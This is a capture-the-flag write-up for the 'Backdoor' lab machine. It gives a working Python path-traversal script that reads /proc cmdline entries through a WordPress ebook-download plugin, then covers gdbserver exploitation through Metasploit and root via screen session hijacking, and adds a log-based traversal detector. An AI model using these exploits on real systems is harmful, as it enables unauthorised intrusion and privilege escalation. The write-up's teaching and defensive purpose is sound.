I tried getting id_rsa through the LFI, but the user's home directory didn't have any SSH keys.
nmap reported port 1337 as the "?waste" service (NOTE: ?waste wasn't the service actually running on port 1337).
Let's check which service was really listening on that port.
I read the man page for proc and found /proc/[pid]/cmdline interesting, since it shows the command line a process was started with.
Man page of proc : https://man7.org/linux/man-pages/man5/proc.5.html
I didn't find any exploit that lists the running services, so I made one.
Check Services
Exploit.py
import requests

url = 'http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl='
pl = []
start = 900  # The service was on 956 for me; if you don't find the service, try changing the start point

# Build one traversal URL per candidate PID, pointing at /proc/<pid>/cmdline
for i in range(start, 1010):
    pl.append(f'{url}../../../../../../../../../../../../../../../proc/{i}/cmdline')

# Request each one and stop at the first cmdline that mentions port 1337
for i in pl:
    r = requests.get(i)
    check = r.text
    if '1337' in check:
        print(check)
        print('SERVICE SUCCESSFULLY FOUND')
        break
    else:
        print(f'trying on /proc/{start}/cmdline')
        start += 1
Output.txt
../../../../../../../../../../../../../../../proc/956/cmdline
../../../../../../../../../../../../../../../proc/956/cmdline
../../../../../../../../../../../../../../../proc/956/cmdline
/bin/sh -c while true;do su user -c "cd /home/user;gdbserver --once 0.0.0.0:1337 /bin/true;"; done
<script>window.close()</script>
So port 1337 is running a gdbserver.
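From the defensive side, the traversal requests above leave an obvious trace in the web server's access log. The following is an added example, not code from the original write-up: it parses constructed Apache-style log lines and flags requests to filedownload.php whose ebookdownloadurl parameter contains traversal sequences, marking those that reach into /proc, /etc, /root or /home. The sample log lines and the classification labels are constructed for this example.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Constructed sample access-log lines (not taken from the original write-up).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2024:10:00:01 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../proc/956/cmdline HTTP/1.1" 200 310 "-" "python-requests/2.28"
10.10.14.5 - - [01/Jan/2024:10:00:02 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=..%252F..%252F..%252Fetc%252Fpasswd HTTP/1.1" 200 1800 "-" "curl/7.81"
192.168.1.20 - - [01/Jan/2024:10:00:03 +0000] "GET /wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=books/guide.pdf HTTP/1.1" 200 52000 "-" "Mozilla/5.0"
192.168.1.21 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 4000 "-" "Mozilla/5.0"
"""

# Common log format: client IP, timestamp, request line, status code
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# Top-level directories that a download plugin has no business serving
SENSITIVE = re.compile(r'(^|/)(proc|etc|root|home)(/|$)')


def classify(line):
    """Return (ip, reason) for a request that looks like path traversal via
    the ebookdownloadurl parameter, or None for a benign or unparsable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parsed = urlparse(m.group('path'))
    if not parsed.path.endswith('/filedownload.php'):
        return None
    for raw in parse_qs(parsed.query).get('ebookdownloadurl', []):
        # parse_qs decoded once already; decode again to catch double-encoding
        value = unquote(raw)
        if '../' in value or '..\\' in value:
            reason = 'traversal'
            if SENSITIVE.search(value.replace('../', '')):
                reason += '+sensitive-path'
            return m.group('ip'), reason
    return None


def scan(log_text):
    """Classify every line and return only the hits, in log order."""
    return [hit for hit in (classify(l) for l in log_text.splitlines()) if hit]


if __name__ == '__main__':
    for ip, reason in scan(SAMPLE_LOG):
        print(f'{ip}\t{reason}')
```

The two flagged lines come from the same client within a second of each other, which is the pattern a PID-enumeration loop like the one above produces; alerting on repeated hits per source IP is the natural next step.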
Link : https://www.rapid7.com/db/modules/exploit/multi/gdb/gdb_server_exec/
User Shell
Use this msf module to get the user shell: use exploit/multi/gdb/gdb_server_exec
root 937 0.0 0.1 8356 3420 ? S 07:15 0:00 _ /usr/sbin/CRON -f
root 954 0.0 0.0 2608 1596 ? Ss 07:15 0:02 _ /bin/sh -c while true;do sleep 1;find /var/run/screen/S-root/ -empty -exec s
The screen process is running with root privileges.
Root Shell
user@Backdoor:~$ /usr/bin/screen -h
-h lines Set the size of the scrollback history buffer.
-i Interrupt output sooner when flow control is on.
-l Login mode on (update /var/run/utmp), -ln = off.
-ls [match] or -list Do nothing, just list our SockDir [on possible matches].
-L Turn on output logging.
-Logfile file Set logfile name.
-m ignore $STY variable, do create a new screen session.
-O Choose optimal output rather than exact vt100 emulation.
-p window Preselect the named window if it exists.
-q Quiet startup. Exits with non-zero return code if unsuccessful.
-Q Commands will send the response to the stdout of the querying process.
-r [session] Reattach to a detached screen process.
-R Reattach if possible, otherwise start a new session.
-s shell Shell to execute rather than $SHELL.
-S sockname Name this session <pid>.sockname instead of <pid>.<tty>.<host>.
-t title Set title. (window's name).
-T term Use term as $TERM for windows, rather than "screen".
-U Tell screen to use UTF-8 encoding.
-v Print "Screen version 4.08.00 (GNU) 05-Feb-20".
-wipe [match] Do nothing, just clean up SockDir [on possible matches].
-x Attach to a not detached screen. (Multi display mode).
-X Execute <cmd> as a screen command in the specified session.
As there were no exploits available on the internet, we have to play with the flags.
I tried to exploit it with the help of GTFOBins and some of the flags listed here.
So we can get a root shell with the -x flag: -x UserYouWannaHijackSession/HisSessionName